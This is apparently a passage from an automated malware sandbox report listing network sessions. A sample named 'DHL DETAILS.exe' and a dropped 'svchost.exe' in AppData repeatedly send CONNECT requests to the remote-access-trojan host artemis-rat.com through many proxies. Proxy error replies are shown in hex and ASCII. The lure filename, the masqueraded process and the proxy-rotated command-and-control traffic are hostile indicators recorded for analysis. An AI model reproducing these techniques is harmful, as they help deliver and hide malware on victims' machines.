                                                                                    1080192.168.2.552886164.92.86.113505646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.747600079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.780145884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1081192.168.2.553300177.12.118.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.748718977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.074008942 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1082192.168.2.553303121.128.194.154806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.748891115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1083192.168.2.55280951.222.241.157517186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.759299040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1084192.168.2.552853201.174.239.2841536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.766328096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1085192.168.2.552535184.170.249.6541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.776818037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1086192.168.2.55331584.39.112.14431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.778907061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1087192.168.2.55331443.128.146.42156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.785554886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1088192.168.2.5533168.218.231.62156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.796241045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1089192.168.2.553317167.172.86.46104716352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.817333937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1090192.168.2.553328129.213.150.205806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.822421074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1091192.168.2.55332123.137.248.19788886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.822916031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1092192.168.2.55330864.43.89.10263616352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.888925076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.541825056 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1093192.168.2.55331945.118.132.180454496352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.891531944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1094192.168.2.553299116.199.168.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.891645908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1095192.168.2.55332246.35.9.110806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.895761967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1096192.168.2.552810176.77.9.22554436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.908876896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.038538933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1097192.168.2.55318595.164.207.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.928026915 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3661
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ezproxies.com
                                                                                    X-Cache-Lookup: NONE from ezproxies.com:58378
                                                                                    Via: 1.1 ezproxies.com (squid/3.5.20)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1098192.168.2.55331394.131.64.945837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.928103924 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3661
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ezproxies.com
                                                                                    X-Cache-Lookup: NONE from ezproxies.com:58378
                                                                                    Via: 1.1 ezproxies.com (squid/3.5.20)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1099192.168.2.552996177.234.244.174322136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.952744961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567672014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1100192.168.2.55333151.15.247.93163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.953809977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1101192.168.2.55332960.188.102.225180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.972374916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1102192.168.2.553330185.49.31.20780816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.976929903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1103192.168.2.5529988.217.143.187156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.988607883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.676973104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1104192.168.2.5514145.252.23.22010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.993752003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.067785978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.145365000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.248508930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1105192.168.2.55300843.155.142.116156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.007886887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
